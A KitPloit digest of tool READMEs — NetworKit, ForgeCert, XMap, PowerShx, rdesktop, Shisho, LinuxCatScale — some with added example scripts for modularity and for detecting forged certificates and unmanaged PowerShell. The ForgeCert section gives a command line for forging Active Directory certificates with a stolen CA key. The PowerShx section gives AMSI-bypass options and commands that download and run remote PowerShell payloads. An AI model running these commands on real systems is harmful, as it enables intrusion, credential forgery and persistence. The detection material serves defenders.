KitPloit - PenTest & Hacking Tools

Networkit - A Growing Open-Source Toolkit For Large-Scale Network Analysis

15 October 2021 at 11:30
By: Zion3R



NetworKit is an open-source tool suite for high-performance network analysis. Its aim is to provide tools for the analysis of large networks in the size range from thousands to billions of edges. For this purpose, it implements efficient graph algorithms, many of them parallel to utilize multicore architectures. These are meant to compute standard measures of network analysis. NetworKit is focused on scalability and comprehensiveness. NetworKit is also a testbed for algorithm engineering and contains novel algorithms from recently published research (see list of publications below).

NetworKit is a Python module. High-performance algorithms are written in C++ and exposed to Python via the Cython toolchain. Python in turn gives us the ability to work interactively and a rich environment of tools for data analysis and scientific computing. Furthermore, NetworKit's core can be built and used as a native library if needed.


Requirements

You will need the following software to install NetworKit as a Python package:

  • A modern C++ compiler, e.g.: g++ (>= 6.1), clang++ (>= 3.9) or MSVC (>= 14.13)
  • OpenMP for parallelism (usually ships with the compiler)
  • Python3 (3.6 or higher is supported)
    • Development libraries for Python3. The package name depends on your distribution. Examples:
      • Debian/Ubuntu: apt-get install python3-dev
      • RHEL/CentOS: dnf install python3-devel
      • Windows: Use the official release installer from www.python.org
  • Pip
  • CMake version 3.6 or higher (Advised to use system packages if available. Alternative: pip3 install cmake)
  • Build system: Make or Ninja
  • Cython version 0.29 or higher (e.g., pip3 install cython)

Install

In order to use NetworKit, you can either install it via package managers or build the Python module from source.


Install via package manager

While the most recent version is generally available from all package managers, the number of older downloadable versions differs between them.


pip
pip3 install [--user] networkit

conda (channel conda-forge)
conda config --add channels conda-forge
conda install networkit [-c conda-forge]

brew
brew install networkit

spack
spack install py-networkit

Building the Python module from source
git clone https://github.com/networkit/networkit networkit
cd networkit
python3 setup.py build_ext [-jX]
pip3 install -e .

The script will call cmake and ninja (make as fallback) to compile NetworKit as a library, build the extensions and copy them to the top folder. By default, NetworKit will be built with the number of available cores in optimized mode. The option -jN sets the number of threads used for compilation.


Usage example

To get an overview and learn about NetworKit's different functions/classes, have a look at our interactive notebooks section, especially the NetworKit UserGuide. Note: to view and edit the computed output from the notebooks, it is recommended to use Jupyter Notebook. This requires the prior installation of NetworKit. You should really check that out before you start working on your network analysis.

We also provide a Binder instance of our notebooks. To access this service, you can either click on the badge at the top or follow this link. Disclaimer: due to rebuilds of the underlying image, it can take some time until your Binder instance is ready for use.

If you only want a short look at how NetworKit is used, the following example provides a glimpse. Here we generate a random hyperbolic graph with 100k nodes and compute its communities with the PLM method:

>>> import networkit as nk
>>> g = nk.generators.HyperbolicGenerator(1e5).generate()
>>> communities = nk.community.detectCommunities(g, inspect=True)
PLM(balanced,pc,turbo) detected communities in 0.14577102661132812 [s]
solution properties:
------------------- -----------
# communities 4536
min community size 1
max community size 2790
avg. community size 22.0459
modularity 0.987243
------------------- -----------
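
The "modularity" line in the PLM output above is the quality measure the community detection optimizes. The following is an added illustration, not NetworKit code, that computes modularity directly from its definition on a constructed six-node graph (two triangles joined by one bridge edge, which you can read as six hosts and the traffic observed between them) and compares three candidate partitions. The edge list and partitions are constructed for the example.

```python
"""Modularity of a community partition, computed from its definition (added example)."""
from collections import defaultdict

# Constructed undirected graph: triangle (0,1,2) and triangle (3,4,5) joined by
# the bridge edge (2,3). One entry per edge, no duplicates.
EDGES = [(0, 1), (0, 2), (1, 2), (3, 4), (3, 5), (4, 5), (2, 3)]


def degrees(edges):
    """Degree of every node in an undirected edge list."""
    deg = defaultdict(int)
    for u, v in edges:
        deg[u] += 1
        deg[v] += 1
    return dict(deg)


def modularity(edges, partition):
    """Newman modularity Q = sum over communities c of [ L_c / m - (d_c / 2m)^2 ].

    edges: (u, v) pairs of an undirected graph.
    partition: dict mapping node -> community id.
    L_c = number of edges inside community c, d_c = sum of degrees of its nodes,
    m = total number of edges. Q lies in [-1/2, 1]; 0 means no better than a
    random split, values near 1 mean densely connected, well-separated groups.
    """
    m = len(edges)
    if m == 0:
        return 0.0
    intra = defaultdict(int)     # L_c per community
    deg_sum = defaultdict(int)   # d_c per community
    for node, d in degrees(edges).items():
        deg_sum[partition[node]] += d
    for u, v in edges:
        if partition[u] == partition[v]:
            intra[partition[u]] += 1
    return sum(intra[c] / m - (deg_sum[c] / (2 * m)) ** 2 for c in deg_sum)


def best_partition(edges, candidates):
    """Return (Q, partition) for the candidate with the highest modularity."""
    return max(((modularity(edges, p), p) for p in candidates), key=lambda t: t[0])


# Three candidate partitions of the constructed graph.
TWO_TRIANGLES = {0: 0, 1: 0, 2: 0, 3: 1, 4: 1, 5: 1}
ONE_COMMUNITY = {n: 0 for n in range(6)}
SINGLETONS = {n: n for n in range(6)}

if __name__ == "__main__":
    for name, part in [("two triangles", TWO_TRIANGLES),
                       ("one community", ONE_COMMUNITY),
                       ("singletons", SINGLETONS)]:
        print(f"{name:14s} Q = {modularity(EDGES, part):+.4f}")
```

Splitting along the bridge scores Q = 5/14, lumping everything together scores exactly 0, and isolating every node scores negative; PLM searches for the partition that maximizes this value on graphs far too large to enumerate candidates.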

Install the C++ Core only

In case you only want to work with NetworKit's C++ core, you can either install it via package managers or build it from source.


Install C++ core via package manager

conda (channel conda-forge)
conda config --add channels conda-forge
conda install libnetworkit [-c conda-forge]

brew
brew install libnetworkit

spack
spack install libnetworkit

Building the C++ core from source

We recommend CMake and your preferred build system for building the C++ part of NetworKit.

The following description shows how to use CMake in order to build the C++ Core only:

First, create and change to a build directory (in this case named build):

mkdir build
cd build

Then call CMake to generate files for the make build system, specifying the directory of the root CMakeLists.txt file (e.g., ..). After this, make is called to start the build process:

cmake ..
make -jX

To speed up the compilation with make on a multi-core machine, you can append -jX, where X denotes the number of threads to compile with.


Use NetworKit as a library

This paragraph explains how to use the NetworKit core C++ library in case it has been built from source. For how to use it when installed via package managers, best refer to the official documentation (brew, conda, spack).

In order to use the previously compiled NetworKit library, you need to have it installed, and link it while compiling your project. Use these instructions to compile and install NetworKit in /usr/local:

cmake ..
make -jX install

Once NetworKit has been installed, you can use include directives in your C++-application as follows:

#include <networkit/graph/Graph.hpp>

You can compile your source as follows:

g++ my_file.cpp -lnetworkit

Unit tests

Building and running NetworKit unit tests is not mandatory. However, as a developer you might want to write and run unit tests for your code, or if you experience any issues with NetworKit, you might want to check if NetworKit runs properly. The unit tests can only be run from a clone or copy of the repository and not from a pip installation. In order to run the unit tests, you need to compile them first. This is done by setting the CMake NETWORKIT_BUILD_TESTS flag to ON:

cmake -DNETWORKIT_BUILD_TESTS=ON ..

Unit tests are implemented using GTest macros such as TEST_F(CentralityGTest, testBetweennessCentrality). Single tests can be executed with:

./networkit_tests --gtest_filter=CentralityGTest.testBetweennessCentrality

Additionally, one can specify the log output level by adding --loglevel <log_level>; supported log levels are: TRACE, DEBUG, INFO, WARN, ERROR, and FATAL.


Compiling with address/leak sanitizers

Sanitizers are great tools to debug your code. NetworKit provides additional CMake flags to enable address, leak, and undefined behavior sanitizers. To compile your code with sanitizers, set the CMake flag NETWORKIT_WITH_SANITIZERS to either address or leak:

cmake -DNETWORKIT_WITH_SANITIZERS=leak ..

By setting this flag to address, your code will be compiled with the address and the undefined sanitizers. Setting it to leak also adds the leak sanitizer.


Documentation

The most recent version of the documentation can be found online.


Contact

For questions regarding NetworKit, have a look at our issues-section and see if there is already an open discussion. If not feel free to open a new issue. To stay updated about this project, subscribe to our mailing list.


Contributions

We encourage contributions to the NetworKit source code. See the development guide for instructions. For support please contact the mailing list.


Credits

List of contributors can be found on the NetworKit website credits page.


External Code

The program source includes:


License

The source code of this program is released under the MIT License. We ask you to cite us if you use this code in your project (c.f. the publications section below and especially the technical report). Feedback is also welcome.


Publications

The NetworKit publications page lists the publications on NetworKit as a toolkit, on algorithms available in NetworKit, and simply using NetworKit. We ask you to cite the appropriate ones if you found NetworKit useful for your own research.



ForgeCert - "Golden" Certificates

14 October 2021 at 20:30
By: Unknown


ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.

This attack is codified as DPERSIST1 in our "Certified Pre-Owned" whitepaper. This code base was released ~45 days after the whitepaper was published.

@tifkin_ is the primary author of ForgeCert.

@tifkin_ and @harmj0y are the primary authors of the associated Active Directory Certificate Service research (blog and whitepaper).


Background

As described in the Background and Forging Certificates with Stolen CA Certificates - DPERSIST1 sections of our whitepaper, the private key for a Certificate Authority's CA certificate is protected on the CA server either via DPAPI or hardware (HSM/TPM). Additionally, the certificate (sans private key) is published to the NTAuthCertificates forest object, which defines CA certificates that enable authentication to AD. Put together, a CA whose certificate is present in NTAuthCertificates uses its private key to sign certificate signing requests (CSRs) from requesting clients. This graphic summarizes the process:

The security of the CA's private key is paramount. As mentioned, if the private key is not protected by a hardware solution like a TPM or a HSM, the key will be encrypted with the Data Protection API (DPAPI) and stored on disk on the CA server. If an attacker is able to compromise a CA server, they can extract the private key for any CA certificate not protected by hardware by using @gentilkiwi's Mimikatz or GhostPack's SharpDPAPI project. THEFT3 in the whitepaper describes this process for machine certificates.

Because the only key material used to sign issued certificates is the CA's private key, if an attacker steals such a key (for a certificate in NTAuthCertificates) they can forge certificates capable of domain authentication. These forged certificates can be for any principal in the domain (though the account needs to be "active" for authentication to be possible, so accounts like krbtgt will not work) and the certificates will be valid for as long as the CA certificate is valid (usually 5 years by default but can be set to be longer).

Also, as these certificates are not a product of the normal issuance process, the CA is not aware that they were created. Thus, the certificates cannot be revoked.

Note: the private key for ANY CA certificate in NTAuthCertificates (root or subordinate CA) can be used to forge certificates capable of authentication in the forest. If the certificate/key is from a subordinate CA, a legitimate CRL for verification of the certificate chain must be supplied.

ForgeCert uses BouncyCastle's X509V3CertificateGenerator to perform the forgeries.


Command Line Usage
C:\Temp>ForgeCert.exe
ForgeCert 1.0.0.0
Copyright c 2021

ERROR(S):
Required option 'CaCertPath' is missing.
Required option 'SubjectAltName' is missing.
Required option 'NewCertPath' is missing.
Required option 'NewCertPassword' is missing.

--CaCertPath Required. CA private key as a .pfx or .p12 file

--CaCertPassword Password to the CA private key file

--Subject (Default: CN=User) Subject name in the certificate

--SubjectAltName Required. UPN of the user to authenticate as

--NewCertPath Required. Path where to save the new .pfx certificate

--NewCertPassword Required. Password to the .pfx file

--CRL ldap path to a CRL for the forged certificate

--help Display this help screen.

--version Display version information.


Usage

Note: for a complete walkthrough of stealing a CA private key and forging auth certs, see DPERSIST1 in the whitepaper.

Context:

  • The stolen CA's certificate is ca.pfx, encrypted with a password of Password123!
  • The subject is arbitrary since we're specifying a subject alternative name for the certificate.
  • The subject alternative name (i.e., the user we're forging a certificate for), is [email protected].
  • The forged certificate will be saved as localadmin.pfx, encrypted with the password NewPassword123!

C:\Tools\ForgeCert>ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "Password123!" --Subject "CN=User" --SubjectAltName "[email protected]" --NewCertPath localadmin.pfx --NewCertPassword "NewPassword123!"
CA Certificate Information:
Subject: CN=theshire-DC-CA, DC=theshire, DC=local
Issuer: CN=theshire-DC-CA, DC=theshire, DC=local
Start Date: 1/4/2021 10:48:02 AM
End Date: 1/4/2026 10:58:02 AM
Thumbprint: 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2
Serial: 14BFC25F2B6EEDA94404D5A5B0F33E21

Forged Certificate Information:
Subject: CN=User
SubjectAltName: [email protected]
Issuer: CN=theshire-DC-CA, DC=theshire, DC=local
Start Date: 7/26/2021 3:38:45 PM
End Date: 7/26/2022 3:38:45 PM
Thumbprint: C5789A24E91A40819EFF7CFD77150595F8B9878D
Serial: 3627A48F90F6869C3215FF05BC3B2E42

Done. Save d forged certificate to localadmin.pfx with the password 'NewPassword123!'

This forgery can be done on an attacker-controlled system, and the resulting certificate can be used with Rubeus to request a TGT (and/or retrieve the user's NTLM ;)


Defensive Considerations

The TypeRefHash of the current ForgeCert codebase is b26b451ff2c947ae5904f962e56facbb45269995fbb813070386472f307cfcf0.

The TypeLib GUID of ForgeCert is bd346689-8ee6-40b3-858b-4ed94f08d40a. This is reflected in the Yara rules currently in this repo.

See PREVENT1, DETECT3, and DETECT5 in our whitepaper for prevention and detection guidance.

Fabian Bader published a great post on how to mitigate many uses of "Golden Certificates" through OCSP tweaks. Note, though, that in the Final Thoughts section he mentions: "This method is not bulletproof at all. Since the attacker is in charge of the certificate creation process, she could just change the serial number to a valid one." This was implemented in his PR, though remember that by default the serial number will be randomized, meaning the OCSP prevention should work in many cases and is worth implementing in our opinion.

We believe there may be opportunities to build Yara/other detection rules for the types of forged certificates this project produces. If any defensive researchers find a good way to signature these files, please let us know and we will update the Yara rules/defensive guidance here.
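
The serial-number observation above can be turned into a detection on the domain controller side. A forged certificate is signed with the real CA key, so it chains correctly, but it never went through the CA's issuance process and therefore has no row in the CA database. The following added example (not ForgeCert or whitepaper code) cross-checks the certificate fields that Kerberos TGT-request events (event ID 4768, PKINIT pre-authentication) carry against the list of serials the CA actually issued. The issued-serial list, the text rendering of the events and the two legitimate serials are constructed; the forged certificate's issuer, serial and thumbprint are taken from the ForgeCert output above.

```python
"""Flag certificate-based Kerberos logons whose certificate the CA never issued (added example)."""
import re

# Issuer DN of the enterprise CA (from the sample output) and the serials it has
# issued. In practice the set comes from an export of the CA database; the two
# serial values here are constructed.
CA_ISSUER = "CN=theshire-DC-CA, DC=theshire, DC=local"
CA_ISSUED_SERIALS = {
    "1A0000001CF3B2D4E5F60718A9000000001C",
    "1A0000001DB6A3C1D2E4F5A6B7000000001D",
}

# Constructed rendering of three 4768 events as "Field: value" lines, using the
# EventData field names the real event carries (TargetUserName, PreAuthType,
# CertIssuerName, CertSerialNumber, CertThumbprint). Blank lines separate events.
# PreAuthType 16 is PA-PK-AS-REQ (certificate); 2 is a password timestamp.
SAMPLE_EVENTS = """\
EventID: 4768
TargetUserName: alice
PreAuthType: 16
CertIssuerName: CN=theshire-DC-CA, DC=theshire, DC=local
CertSerialNumber: 1a0000001cf3b2d4e5f60718a9000000001c
CertThumbprint: 0F1E2D3C4B5A69788796A5B4C3D2E1F00F1E2D3C

EventID: 4768
TargetUserName: bob
PreAuthType: 2
CertIssuerName:
CertSerialNumber:
CertThumbprint:

EventID: 4768
TargetUserName: localadmin
PreAuthType: 16
CertIssuerName: CN=theshire-DC-CA, DC=theshire, DC=local
CertSerialNumber: 3627A48F90F6869C3215FF05BC3B2E42
CertThumbprint: C5789A24E91A40819EFF7CFD77150595F8B9878D
"""


def parse_events(text):
    """Split the constructed rendering into one dict of fields per event."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        events.append(fields)
    return events


def normalize_serial(serial):
    """Serials show up with or without spaces/colons and in either case."""
    return re.sub(r"[\s:]", "", serial).upper()


def normalize_dn(dn):
    """Compare issuer DNs ignoring case and whitespace around separators."""
    return re.sub(r"\s*,\s*", ",", dn.strip()).lower()


def find_unissued_cert_logons(events, issuer, issued_serials):
    """Return certificate logons that present a cert from `issuer` with a serial the CA never issued."""
    known = {normalize_serial(s) for s in issued_serials}
    findings = []
    for ev in events:
        if ev.get("EventID") != "4768" or not ev.get("CertSerialNumber"):
            continue  # password pre-auth or no certificate: nothing to check
        if normalize_dn(ev.get("CertIssuerName", "")) != normalize_dn(issuer):
            continue  # other issuers are a separate question (NTAuth membership)
        serial = normalize_serial(ev["CertSerialNumber"])
        if serial not in known:
            findings.append({
                "user": ev.get("TargetUserName"),
                "serial": serial,
                "thumbprint": ev.get("CertThumbprint"),
                "reason": "certificate serial not present in CA database",
            })
    return findings


if __name__ == "__main__":
    hits = find_unissued_cert_logons(parse_events(SAMPLE_EVENTS), CA_ISSUER, CA_ISSUED_SERIALS)
    for h in hits:
        print(f"ALERT user={h['user']} serial={h['serial']} thumbprint={h['thumbprint']}: {h['reason']}")
```

The check has the limitation the README quotes from Fabian Bader: an attacker who sets the serial to one the CA really issued is not caught by serial matching alone, so treating every certificate logon whose (serial, thumbprint) pair is unknown to the CA database as a baseline deviation is the stronger variant when thumbprints are available to the analyst.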


Reflections

There is a clear parallel between "Golden Tickets" (forged TGTs) and these "Golden Certificates" (forged AD CS certs). Both the krbtgt hash and the CA private key are cryptographic material critical to the security of an Active Directory environment, and both can be used to forge authenticators for arbitrary users. However, while the krbtgt hash can be retrieved remotely over DCSync, a CA private key must (at least as far as we know) be recovered through code execution on the CA machine itself. While a krbtgt hash can be rotated relatively easily, rotating a CA private key is significantly more difficult.

On the subject of public disclosure, we self-embargoed the release of our offensive tooling (ForgeCert as well as Certify) for ~45 days after we published our whitepaper in order to give organizations a chance to get a grip on the issues surrounding Active Directory Certificate Services. However, we have found that organizations and vendors have historically often not fixed issues or built detections for "theoretical" attacks until someone proves something is possible with a proof of concept.

This is reflected in some people's reaction to the research: "this IS StUPId, oF COurse YoU Can FORge CERts WITH ThE ca PriVAtE KeY". To which we state: yes, many things are possible, but PoC||GTFO.



Xmap - A Fast Network Scanner Designed For Performing Internet-wide IPv6 & IPv4 Network Research Scanning

14 October 2021 at 11:30
By: Zion3R


XMap is a fast network scanner designed for performing Internet-wide IPv6 & IPv4 network research scanning.

XMap is reimplemented and improved thoroughly from ZMap and is fully compatible with ZMap, armed with the "5 minutes" probing speed and novel scanning techniques. XMap is capable of scanning the 32-bit address space in under 45 minutes. With a 10 GigE connection and PF_RING, XMap can scan the 32-bit address space in under 5 minutes. Moreover, leveraging the novel IPv6 scanning approach, XMap can discover the IPv6 Network Periphery fast. Furthermore, XMap can scan the network space randomly with any length and at any position, such as 2001:db8::/32-64 and 192.168.0.1/16-20. Besides, XMap can probe multiple ports simultaneously.

XMap operates on GNU/Linux, Mac OS, and BSD. XMap currently has implemented probe modules for ICMP Echo scans, TCP SYN scans, and UDP probes.

With banner grab and TLS handshake tool, ZGrab2, more involved scans could be performed.


Installation

The latest stable release of XMap is version 1.0.0 and supports Linux, macOS, and BSD. We recommend installing XMap from HEAD rather than using a distro package manager (not supported yet).

Instructions on building XMap from source can be found in INSTALL.


Usage

A guide to using XMap can be found in our GitHub Wiki.

Simple commands and options to using XMap can be found in USAGE.


Paper

Fast IPv6 Network Periphery Discovery and Security Implications.

Abstract. Numerous measurement studies have been performed to discover IPv4 network security issues by leveraging fast Internet-wide scanning techniques. However, IPv6 brings a 128-bit address space and renders brute-force network scanning impractical. Although significant efforts have been dedicated to enumerating active IPv6 hosts, limited by technique efficiency and probing accuracy, large-scale empirical measurement studies of the growing IPv6 networks are infeasible now.

To fill this research gap, by leveraging the extensively adopted IPv6 address allocation strategy, we propose a novel IPv6 network periphery discovery approach. Specifically, XMap, a fast network scanner, is developed to find the periphery, such as a home router. We evaluate it on twelve prominent Internet service providers and harvest 52M active peripheries. Grounded on these found devices, we explore IPv6 network risks of the unintended exposed security services and the flawed traffic routing strategies. First, we demonstrate the unintended exposed security services in IPv6 networks, such as DNS and HTTP, have become emerging security risks by analyzing 4.7M peripheries. Second, by inspecting the periphery's packet routing strategies, we present the flawed implementations of IPv6 routing protocol affecting 5.8M router devices. Attackers can exploit this common vulnerability to conduct effective routing loop attacks, inducing DoS to the ISP's and home routers with an amplification factor of >200. We responsibly disclose those issues to all involved vendors and ASes and discuss mitigation solutions. Our research results indicate that the security community should revisit IPv6 network strategies immediately.

Authors. Xiang Li, Baojun Liu, Xiaofeng Zheng, Haixin Duan, Qi Li, Youjun Huang.

Conference. Proceedings of the 2021 IEEE/IFIP International Conference on Dependable Systems and Networks (DSN '21)

Paper. [PDF], [Slides] and [Video].

CNVD/CVE. [Lists].


License and Copyright

XMap Copyright 2021 Xiang Li from Network and Information Security Lab Tsinghua University

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See LICENSE for the specific language governing permissions and limitations under the License.



PowerShx - Run Powershell Without Software Restrictions

13 October 2021 at 20:30
By: Zion3R


Unmanaged PowerShell execution using DLLs or a standalone executable.


Introduction

PowerShx is a rewrite and expansion of the PowerShdll project. PowerShx provides functionality for bypassing AMSI and running PS Cmdlets.


Features
  • Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe or regsvr32.exe.
  • Run Powershell without powershell.exe or powershell_ise.exe
  • AMSI Bypass features.
  • Run Powershell scripts directly from the command line or Powershell files
  • Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32
rundll32 PowerShx.dll,main -e <PS script to run>
rundll32 PowerShx.dll,main -f <path>                 Run the script passed as argument
rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet>  Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w                        Start an interactive console in a new window
rundll32 PowerShx.dll,main -i                        Start an interactive console
rundll32 PowerShx.dll,main -s                        Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v                        Print execution output to the console

Alternatives (credit to SubTee for these techniques):

1. InstallUtil
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll

2. regsvcs
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll

3. regasm
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll

4. regsvr32
regsvr32 /s /u PowerShx.dll --> calls DllUnregisterServer
regsvr32 /s PowerShx.dll    --> calls DllRegisterServer

.exe version
PowerShx.exe -i                          Start an interactive console
PowerShx.exe -e <PS script to run>
PowerShx.exe -f <path>                   Run the script passed as argument
PowerShx.exe -f <path> -c <PS Cmdlet>    Load a script and run a PS cmdlet
PowerShx.exe -s                          Attempt to bypass AMSI

Embedded payloads

Payloads can be embedded by updating the data dictionary "Common.Payloads.PayloadDict" in the "Common" project and calling it in the Handle() method of PsSession.cs. Example, in the Handle() method:

private void Handle(Options options)
{
    // Pre-execution before user script
    _ps.Exe(Payloads.PayloadDict["amsi"]);
}

Examples

Run a base64 encoded script
rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode


Run a remote script
rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"
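
The usage above is also a description of what a defender can look for: PowerShell hosted by a process other than powershell.exe, and the Windows DLL loaders listed (rundll32, InstallUtil, regsvcs, regasm, regsvr32) being handed a DLL that does not live under the Windows directory. The following added example (not PowerShx code) runs two such checks over constructed process-creation and image-load records; the field names follow the Sysmon event 1 and event 7 fields Image, CommandLine and ImageLoaded, and the sample records are modelled on the command lines in this usage section. The GAC path of the PowerShell engine and the sample paths are constructed.

```python
"""Detect unmanaged PowerShell hosting and LOLBin DLL loading (added example)."""
import re

# DLL loaders named in the README; all ship with Windows, so the image alone is not suspicious.
LOLBIN_LOADERS = {"rundll32.exe", "installutil.exe", "regsvcs.exe", "regasm.exe", "regsvr32.exe"}

# Processes expected to load the PowerShell engine.
EXPECTED_PS_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

# The managed PowerShell engine assembly (also seen as the .ni.dll native image).
PS_ENGINE = "system.management.automation"

# DLLs under these directories are treated as trusted for the loader check.
TRUSTED_DLL_DIRS = ("c:\\windows\\",)

# Constructed telemetry modelled on the README's command lines.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 PowerShx.dll,main -i"},
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\Public\PowerShx.dll"},
    {"EventType": "ProcessCreate",   # benign: system DLL under C:\Windows
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"EventType": "ImageLoad",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"},
    {"EventType": "ImageLoad",       # benign: the real PowerShell host
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(ev):
    """Flag a Windows DLL loader started with a DLL outside the trusted directories."""
    image = basename(ev["Image"])
    if image not in LOLBIN_LOADERS:
        return None
    # First .dll token on the command line; rundll32 appends ",entrypoint" so stop at commas.
    m = re.search(r'([^\s",]+\.dll)', ev["CommandLine"], re.IGNORECASE)
    if not m:
        return None
    dll = m.group(1).lower()
    if any(dll.startswith(d) for d in TRUSTED_DLL_DIRS):
        return None
    return f"{image} loading DLL outside the Windows directory: {m.group(1)}"


def check_image_load(ev):
    """Flag the PowerShell engine being loaded by a process that is not a PowerShell host."""
    if PS_ENGINE not in basename(ev["ImageLoaded"]):
        return None
    host = basename(ev["Image"])
    if host in EXPECTED_PS_HOSTS:
        return None
    return f"unmanaged PowerShell: {host} loaded {basename(ev['ImageLoaded'])}"


def scan(events):
    """Apply the check matching each event type; return (event type, message) pairs."""
    findings = []
    for ev in events:
        if ev["EventType"] == "ProcessCreate":
            hit = check_process_create(ev)
        elif ev["EventType"] == "ImageLoad":
            hit = check_image_load(ev)
        else:
            hit = None
        if hit:
            findings.append((ev["EventType"], hit))
    return findings


if __name__ == "__main__":
    for event_type, message in scan(SAMPLE_EVENTS):
        print(f"[{event_type}] {message}")
```

The image-load check is the more robust of the two, since it does not depend on how the DLL was named or where it was dropped; the command-line check catches the relative "PowerShx.dll" argument precisely because a DLL path that does not resolve under the Windows directory is unusual for these loaders.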

Requirements

.NET 4


Known Issues

Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly.

In dll mode, interactive mode and command output rely on hijacking the parent process's console. If the parent process does not have a console, use the -n switch to not show output; otherwise the application will crash.

Due to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.



Rdesktop - Open Source Client for Microsoft's RDP protocol

13 October 2021 at 11:30
By: Zion3R


rdesktop is an open source client for Microsoft's RDP protocol. It is known to work with Windows versions ranging from NT 4 Terminal Server to Windows 2012 R2 RDS. rdesktop currently has implemented the RDP version 4 and 5 protocols.


Installation

rdesktop uses a GNU-style build procedure. Typically all that is necessary to install rdesktop is the following:

% ./configure
% make
% make install

The default is to install under /usr/local. This can be changed by adding --prefix=<directory> to the configure line.

The smart-card support module uses PCSC-lite. You should use PCSC-lite 1.2.9 or later. To enable smart-card support in rdesktop, add --enable-smartcard to the configure line.


Note for users building from source

If you have retrieved a snapshot of the rdesktop source, you will first need to run ./bootstrap in order to generate the build infrastructure. This is not necessary for release versions of rdesktop.


Usage

Connect to an RDP server with:

% rdesktop server

where server is the name of the Terminal Services machine. If you receive "Connection refused", this probably means that the server does not have Terminal Services enabled, or there is a firewall blocking access.

You can also specify a number of options on the command line. These are listed in the rdesktop manual page (run man rdesktop).



Shisho - Lightweight Static Analyzer For Several Programming Languages

12 October 2021 at 20:30
By: Zion3R


Shisho is a lightweight static analyzer for developers.


Please see the usage documentation for further information.



Try at Playground

You can try Shisho at our playground.


Try with Docker

You can try shisho on your machine as follows:

echo "func test(v []string) int { return len(v) + 1; }" | docker run -i ghcr.io/flatt-security/shisho-cli:latest find "len(:[...])" --lang=go
echo "func test(v []string) int { return len(v) + 1; }" > file.go
docker run -i -v $(pwd):/workspace ghcr.io/flatt-security/shisho-cli:latest find "len(:[...])" --lang=go /workspace/file.go

Install with pre-built binaries

When you'd like to run shisho outside docker containers, please follow the instructions below:


Linux / macOS

Run the following command(s):

# Linux
wget https://github.com/flatt-security/shisho/releases/latest/download/build-x86_64-unknown-linux-gnu.zip -O shisho.zip
unzip shisho.zip
chmod +x ./shisho
mv ./shisho /usr/local/bin/shisho

# macOS
wget https://github.com/flatt-security/shisho/releases/latest/download/build-x86_64-apple-darwin.zip -O shisho.zip
unzip shisho.zip
chmod +x ./shisho
mv ./shisho /usr/local/bin/shisho

Then you'll find the shisho executable in /usr/local/bin.


Windows

Download the prebuilt binary from releases and put it into a directory on your %PATH%.

If you're using Windows Subsystem for Linux, you can install shisho with the above instructions.


More


LinuxCatScale - Incident Response Collection And Processing Scripts With Automated Reporting Scripts

12 October 2021 at 11:30
By: Zion3R


Linux CatScale is a bash script that uses living-off-the-land tools to collect extensive data from Linux-based hosts. The data aims to help DFIR professionals triage and scope incidents. An ELK Stack instance is also configured to consume the output and assist the analysis process.


Usage

These scripts were built to automate as much as possible. We recommend running them from an external device/USB to avoid overwriting evidence, in case you need a full image in the future.

Please run the collection script on suspected hosts with sudo rights. fsecure_incident-response_linux_collector_0.7.sh is the only file you need to run the collection.

